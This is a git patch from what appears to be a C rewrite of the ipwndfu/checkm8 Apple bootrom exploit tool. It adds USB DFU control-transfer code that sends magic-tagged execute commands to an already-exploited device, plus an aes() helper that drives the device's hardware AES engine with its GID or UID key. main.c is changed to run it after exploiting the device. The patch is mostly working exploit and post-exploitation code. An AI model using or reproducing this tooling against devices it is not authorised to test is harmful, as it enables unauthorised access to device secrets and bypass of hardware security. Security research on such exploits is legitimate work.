From a65945db09278052f1b9278ac5b78463b4e68ce9 Mon Sep 17 00:00:00 2001
From: Gregor Haas <gregorhaas1997@gmail.com>
Date: Fri, 8 Nov 2019 18:43:23 -0500
Subject: [PATCH] implemented aes (sort of), might reintroduce libusb?

---
 .gitmodules                              |  3 ++
 CMakeLists.txt                           |  2 +-
 exploit/checkm8.h                        |  8 +++
 exploit/commands.c                       | 69 ++++++++++++++++++++++++
 exploit/{exploit_helpers.c => exploit.c} |  2 -
 libusb                                   |  1 +
 main.c                                   | 14 +++--
 7 files changed, 93 insertions(+), 6 deletions(-)
 create mode 100644 .gitmodules
 create mode 100644 exploit/commands.c
 rename exploit/{exploit_helpers.c => exploit.c} (97%)
 create mode 160000 libusb

diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..27465c7
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "libusb"]
+	path = libusb
+	url = https://github.com/libusb/libusb
diff --git a/CMakeLists.txt b/CMakeLists.txt
index 8d66ffd..029e34f 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -6,5 +6,5 @@ set(CMAKE_C_FLAGS -g)
 
 add_executable(ipwndfu main.c
         exploit/libusb_helpers.c exploit/libusb_helpers.h
-        exploit/exploit_helpers.c exploit/checkm8.h)
+        exploit/exploit.c exploit/checkm8.h exploit/commands.c)
 target_link_libraries(ipwndfu usb-1.0)
diff --git a/exploit/checkm8.h b/exploit/checkm8.h
index 7377c12..8b390af 100644
--- a/exploit/checkm8.h
+++ b/exploit/checkm8.h
@@ -3,4 +3,12 @@
 
 int exploit_device();
 
+#define AES_ENCRYPT 16
+#define AES_DECRYPT 17
+
+#define AES_GID_KEY 0x2000200
+#define AES_UID_KEY 0x2000201
+
+int aes(unsigned char *source, unsigned char *target, int encrypt, int key);
+
 #endif //IPWNDFU_REWRITE_C_CHECKM8_H
diff --git a/exploit/commands.c b/exploit/commands.c
new file mode 100644
index 0000000..e0bbb63
--- /dev/null
+++ b/exploit/commands.c
@@ -0,0 +1,69 @@
+#include <string.h>
+
+#include "libusb_helpers.h"
+#include "checkm8.h"
+
+#define EXEC_MAGIC 0x6365786563657865
+#define DONE_MAGIC 0x656e6f64656e6f64
+#define MEMC_MAGIC 0x636d656d636d656d
+#define MEMS_MAGIC 0x736d656d736d656d
+
+int command(unsigned char *request_data, int request_len, unsigned char *response_buf, int response_len)
+{
+    libusb_context *usb_ctx = NULL;
+    struct libusb_device_bundle bundle;
+
+    libusb_init(&usb_ctx);
+    get_test_device(usb_ctx, &bundle);
+
+    unsigned char nullbuf[16];
+    memset(nullbuf, '\0', 16);
+
+    libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 16, 5000);
+    libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, nullbuf, 0, 100);
+    libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
+    libusb_control_transfer(bundle.handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
+    libusb_control_transfer(bundle.handle, 0x21, 1, 0, 0, request_data, request_len, 5000);
+
+    if(response_len == 0)
+    {
+        libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, 1, 5000);
+        return 0;
+    }
+    else
+    {
+        libusb_control_transfer(bundle.handle, 0xA1, 2, 0xFFFF, 0, response_buf, request_len, 5000);
+        return 0;
+    }
+}
+
+
+int execute(unsigned long *args, int nargs, unsigned char *response_buf, int response_len)
+{
+    unsigned long cmd_buf[nargs + 1];
+    cmd_buf[0] = EXEC_MAGIC;
+    memcpy(&cmd_buf[1], args, 8 * nargs);
+
+    return command((unsigned char *) cmd_buf, 8 * (nargs + 1), response_buf, response_len);
+}
+
+
+int aes(unsigned char *source, unsigned char *target, int encrypt, int key)
+{
+    unsigned long args[10];
+    args[0] = 0x10000C8F4;  // AES crypto command
+    args[1] = encrypt;
+    args[2] = 0x1800b0048;  // cmd_data_address(7)
+    args[3] = 0x1800B0010;  // cmd_data_address(0)
+    args[4] = 128;          // length of the data
+    args[5] = key;
+    args[6] = 0;
+    args[7] = 0;
+    memcpy(&args[8], source, 16);
+
+    unsigned char response[32];
+    int ret = execute(args, 10, response, 32);
+
+    memcpy(target, &response[16], 16);
+    return ret;
+}
diff --git a/exploit/exploit_helpers.c b/exploit/exploit.c
similarity index 97%
rename from exploit/exploit_helpers.c
rename to exploit/exploit.c
index 9a292c1..dcab96b 100644
--- a/exploit/exploit_helpers.c
+++ b/exploit/exploit.c
@@ -11,8 +11,6 @@ int complete_stage(int stage_function(struct libusb_device_bundle *bundle))
 
     libusb_context *usb_ctx = NULL;
     struct libusb_device_bundle usb_bundle;
-    struct libusb_device_handle *usb_handle;
-    struct libusb_device_descriptor usb_desc;
 
     libusb_init(&usb_ctx);
     get_test_device(usb_ctx, &usb_bundle);
diff --git a/libusb b/libusb
new file mode 160000
index 0000000..4bf9c34
--- /dev/null
+++ b/libusb
@@ -0,0 +1 @@
+Subproject commit 4bf9c343598900188a48e58408aa7e340f7caf87
diff --git a/main.c b/main.c
index 6d346e8..29f07d2 100644
--- a/main.c
+++ b/main.c
@@ -4,12 +4,20 @@
 int main()
 {
     int status = exploit_device();
-    if(status == 0)
+    if(status != 0)
     {
-        printf("Successfully exploited device!\n");
+        printf("Failed to exploit device\n");
+        return status;
     }
     else
     {
-        printf("Failed to exploit device\n");
+        unsigned char aes_in[16] = {0xDE, 0xAD, 0xBE, 0xEF,
+                                    0xDE, 0xAD, 0xBE, 0xEF,
+                                    0xDE, 0xAD, 0xBE, 0xEF,
+                                    0xDE, 0xAD, 0xBE, 0xEF};
+        unsigned char aes_out[16];
+
+        aes(aes_in, aes_out, AES_ENCRYPT, AES_UID_KEY);
+        printf("%s\n", aes_out);
     }
 }
\ No newline at end of file